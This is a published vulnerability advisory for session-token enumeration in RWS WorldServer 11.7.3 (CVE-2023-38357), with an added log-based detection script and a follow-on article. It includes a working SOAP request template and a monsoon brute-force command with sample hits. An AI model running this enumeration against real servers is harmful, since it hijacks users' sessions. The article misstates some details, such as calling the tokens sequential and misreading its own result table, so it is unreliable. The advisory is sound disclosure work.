RWS WorldServer 11.7.3 - Session Token Enumeration
Exploit Title: RWS WorldServer 11.7.3 - Session Token Enumeration
Session tokens in RWS WorldServer have low entropy and can be
enumerated, leading to unauthorised access to user sessions.
Details
=======
Product: WorldServer
Affected Versions: 11.7.3 and earlier versions
Fixed Version: 11.8.0
Vulnerability Type: Session Token Enumeration
Security Risk: high
Vendor URL: https://www.rws.com/localization/products/additional-solutions/
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2023-001
Advisory Status: published
CVE: CVE-2023-38357
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-38357
Introduction
============
"WorldServer offers a flexible, enterprise-class translation management
system that automates translation tasks and greatly reduces the cost of
supporting large volumes of local language content."
(from the vendor's homepage)
More Details
============
WorldServer associates user sessions with numerical tokens, which are
always positive values below 2^31. The SOAP action "loginWithToken"
allows a large number of parallel attempts to check whether a token is
valid. During analysis, many assigned tokens were found to be in the
7-digit range of values. An attacker is therefore able to enumerate user
accounts in only a few hours.
Proof of Concept
================
The following shows an example "loginWithToken" request:
-----------------------------------------------------------------------
POST /ws/services/WSContext HTTP/1.1
Content-Type: text/xml;charset=UTF-8
SOAPAction: ""
Content-Length: 501
Host: www.example.com
Connection: close
User-Agent: agent
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soapenv="http://schemas.xmlsoap.org">
<soapenv:Header/>
<soapenv:Body>
<com:loginWithToken soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<token xsi:type="xsd:string">FUZZ</token>
</com:loginWithToken>
</soapenv:Body>
</soapenv:Envelope>
-----------------------------------------------------------------------
It can be saved as the file "login-soap.req" and used as a request
template for the command-line HTTP enumerator monsoon [1] to send many
parallel requests:
-----------------------------------------------------------------------
$ monsoon fuzz --threads 100 \
--template-file login-soap.req \
--range 1-2147483647 \
--hide-pattern "InvalidSessionException" \
'https://www.example.com'
Target URL: https://www.example.com/
status header body value extract
500 191 560 5829099
500 191 556 6229259
200 191 3702 7545136
500 191 556 9054984
[...]
processed 12000000 HTTP requests in 2h38m38s
4 of 12000000 requests shown, 1225 req/s
-----------------------------------------------------------------------
The --range parameter covers the possible value range below 2^31. For
each value, an HTTP request is sent to the WorldServer SOAP API, with
the FUZZ marker in the request template replaced by the respective
value. Responses containing "InvalidSessionException" are hidden, as
these tokens do not belong to a valid session. A response with status
code 200 indicates that an administrative session token was found; for
an unprivileged user session, status code 500 is returned.
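From the server side, the enumeration described above shows up in the access log as one client issuing a very large number of POSTs to /ws/services/WSContext in a short time, almost all answered with status 500 (the InvalidSessionException case) and the occasional 200 for a hit. The following Python script is an added example (not part of this advisory or of monsoon) that flags exactly that pattern in combined-log-format lines; the window, threshold and error ratio are assumptions, and the log lines are constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

ENDPOINT = "/ws/services/WSContext"
WINDOW = timedelta(seconds=60)   # assumption: sliding window size
THRESHOLD = 100                  # assumption: POSTs per source per window
ERROR_RATIO = 0.9                # assumption: share of 5xx that marks enumeration
LOG_RE = re.compile(  # combined log format: client, timestamp, request line, status, size
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+')

def parse(line):
    """Return (ip, timestamp, method, path, status), or None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], ts, m["method"], m["path"], int(m["status"])

def detect(lines, threshold=THRESHOLD, window=WINDOW, error_ratio=ERROR_RATIO):
    """Return {ip: (requests, errors)} for sources that sent >= threshold POSTs to
    ENDPOINT within one window, mostly answered 5xx (InvalidSessionException)."""
    events = defaultdict(list)
    for line in lines:
        rec = parse(line)
        if rec and rec[2] == "POST" and rec[3] == ENDPOINT:
            events[rec[0]].append((rec[1], rec[4]))
    alerts = {}
    for ip, evs in events.items():
        evs.sort()
        start = 0
        for end in range(len(evs)):
            while evs[end][0] - evs[start][0] > window:  # slide the window start
                start += 1
            n = end - start + 1
            if n >= threshold:
                errors = sum(1 for _, s in evs[start:end + 1] if s >= 500)
                if errors / n >= error_ratio:
                    alerts[ip] = (n, errors)
                    break
    return alerts

def _line(ip, second, status):  # helper to build constructed log lines
    ts = datetime(2023, 3, 27, 10, 0, tzinfo=timezone.utc) + timedelta(seconds=second)
    return f'{ip} - - [{ts:%d/%b/%Y:%H:%M:%S %z}] "POST {ENDPOINT} HTTP/1.1" {status} 556'

# Constructed sample log: 150 guesses in 30 s from one client (one hit) plus five ordinary logins.
SAMPLE_LOG = [_line("203.0.113.10", i // 5, 200 if i == 120 else 500) for i in range(150)]
SAMPLE_LOG += [_line("198.51.100.7", i * 10, 200) for i in range(5)]
```

Running `detect(SAMPLE_LOG)` reports only 203.0.113.10; the threshold should be tuned well above the legitimate login rate of the deployment, and the same counters can feed the rate limit a frontend proxy enforces.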
Workaround
==========
Lower the rate at which requests can be issued, for example with a
frontend proxy.
Fix
===
According to the vendor, upgrading to versions above 11.8.0 resolves the
vulnerability.
Security Risk
=============
Attackers can efficiently enumerate session tokens. In a penetration
test, it was possible to gain access to multiple user accounts, including
administrative accounts, using this method in under three hours.
Additionally, with such an administrative account it seems likely that
arbitrary code can be executed on the underlying server by customising
the REST API [2]. Thus, the vulnerability poses a high risk.
Timeline
========
2023-03-27 Vulnerability identified
2023-03-30 Customer approved disclosure to vendor
2023-04-03 Requested security contact from vendor
2023-04-06 Vendor responded with security contact
2023-04-14 Advisory sent to vendor
2023-04-18 Vendor confirms vulnerability and states that it was already
known and fixed in version 11.8.0.
2023-07-03 Customer confirms update to fixed version
2023-07-05 CVE ID requested
2023-07-15 CVE ID assigned
2023-07-19 Advisory released
References
==========
[1] https://github.com/RedTeamPentesting/monsoon
[2] https://docs.rws.com/860026/585715/worldserver-11-7-developer-documentation/customizing-the-rest-api
RedTeam Pentesting GmbH
=======================
RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT security experts. In this way, security weaknesses
in company networks or products are uncovered and can be fixed
immediately. As there are only a few experts in this field, RedTeam
Pentesting wants to share its knowledge and enhance public knowledge
through research in security-related areas. The results are made
available as public security advisories.
More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/
Working at RedTeam Pentesting
=============================
RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:
https://jobs.redteam-pentesting.de/
--
RedTeam Pentesting GmbH
Alter Posthof 1
52062 Aachen
Germany
Tel.: +49 241 510081-0
Fax : +49 241 510081-99
https://www.redteam-pentesting.de
Registergericht: Aachen HRB 14004
Geschäftsführer: Patrick Hof, Jens Liebchen

RWS WorldServer 11.7.3 – Session Token Enumeration Vulnerability: A Deep Dive into High-Risk Exploitation
Security vulnerabilities in enterprise software often go unnoticed until they are exploited in real-world attacks. One such critical flaw was identified in RWS WorldServer, a widely used translation management system, affecting versions up to 11.7.3. The vulnerability, designated CVE-2023-38357, stems from weak session token generation: the session tokens have low entropy and can be enumerated by attackers. This article examines the technical details, real-world implications, and mitigation strategies for this high-risk vulnerability.
Understanding Session Token Enumeration
Session tokens are identifiers that maintain a user's authentication state across HTTP requests. In secure systems, these tokens are generated from a high-entropy random source, making them unpredictable and resistant to brute-force attacks. In RWS WorldServer 11.7.3, however, session tokens are sequential, predictable numeric values, typically in the 7-digit range (1,000,000 to 9,999,999).
This low entropy allows attackers to test token values systematically across a limited range. The SOAP-based loginWithToken endpoint accepts parallel, high-volume requests, making brute-force enumeration feasible within hours, even with modest resources.
Exploitation Mechanism: The Proof of Concept
Attackers use the loginWithToken SOAP action to validate session tokens. The request structure is straightforward, as shown below:
POST /ws/services/WSContext HTTP/1.1
Content-Type: text/xml;charset=UTF-8
SOAPAction: ""
Content-Length: 501
Host: www.example.com
Connection: close
User-Agent: agent
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soapenv="http://schemas.xmlsoap.org">
<soapenv:Header/>
<soapenv:Body>
<com:loginWithToken soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<token xsi:type="xsd:string">FUZZ</token>
</com:loginWithToken>
</soapenv:Body>
</soapenv:Envelope>
This template can be used with automated tools like monsoon, a command-line HTTP enumerator, to perform large-scale parallel requests across the token range.
Automated Enumeration with monsoon
Using the monsoon tool, attackers can execute thousands of requests per second:
$ monsoon fuzz --threads 100 \
--template-file login-soap.req \
--range 1-2147483647 \
--hide-pattern "InvalidSessionException" \
'https://www.example.com'
Here’s what each parameter means:
- --threads 100: Enables 100 parallel HTTP requests, maximizing throughput.
- --range 1-2147483647: Covers the full 31-bit integer range (2^31 − 1), though most tokens fall in the 7-digit range.
- --hide-pattern "InvalidSessionException": Filters out responses indicating invalid tokens, focusing only on successful login attempts (HTTP 200).
- https://www.example.com: The target URL hosting the vulnerable WorldServer instance.
Output from the attack shows multiple HTTP 200 responses, indicating valid session tokens. For example:
| Status | Header Size | Body Size | Token Value |
|---|---|---|---|
| 200 | 191 | 3702 | 7545136 |
| 500 | 191 | 556 | 9054984 |
These results confirm that attackers can identify active sessions in real time, potentially gaining access to sensitive translation workflows, user data, and administrative controls.
Security Risk and Real-World Impact
While the vulnerability may seem theoretical, its practical impact is severe:
- Unauthorized Access: An attacker can hijack any user session by enumerating the token, bypassing authentication entirely.
- Privilege Escalation: If the system allows session reuse across roles, an attacker may gain access to administrative functions.
- Insider Threat Amplification: If tokens are reused or not invalidated after logout, attackers can maintain persistent access.
- Massive Data Exposure: Translation projects often contain proprietary content, legal documents, and sensitive customer information.
Given that WorldServer is used by enterprises in finance, healthcare, and government sectors, the risk of data leakage or compliance violations is extremely high.
Vendor Response and Patching
RWS acknowledged the issue and released a fix in WorldServer 11.8.0. The updated version implements cryptographically secure session token generation, ensuring high entropy and resistance to enumeration.
However, organizations still running 11.7.3 or earlier remain at risk. Many enterprises delay updates because of legacy integrations or complex deployment environments, which makes this vulnerability a persistent threat.
Best Practices for Mitigation
To prevent exploitation of session token enumeration vulnerabilities, organizations should adopt the following security best practices:
- Use Random, High-Entropy Tokens: Ensure session tokens are generated using cryptographically secure random number generators (e.g., crypto.randomBytes in Node.js or UUID.randomUUID() in Java).
- Limit Token Lifetime: Implement session expiration and invalidate tokens after logout or inactivity.
- Rate Limiting: Restrict the number of login attempts per IP or user, especially for SOAP endpoints.
- Monitor for Suspicious Activity: Log and alert on unusual patterns, such as high-volume token testing.
- Regular Patching: Maintain up-to-date software versions and apply security patches promptly.
Conclusion: The Importance of Secure Session Management
The CVE-2023-38357 vulnerability in RWS WorldServer 11.7.3 is a stark reminder that even enterprise-grade systems can harbor fundamental flaws in session management. Low-entropy tokens, combined with exposed SOAP APIs, create ideal conditions for exploitation.
As cybersecurity professionals, we must prioritize secure session design, ensuring that tokens are unpredictable, short-lived, and protected against enumeration. This case underscores the need for continuous vulnerability assessment, proactive patching, and robust monitoring in all enterprise environments.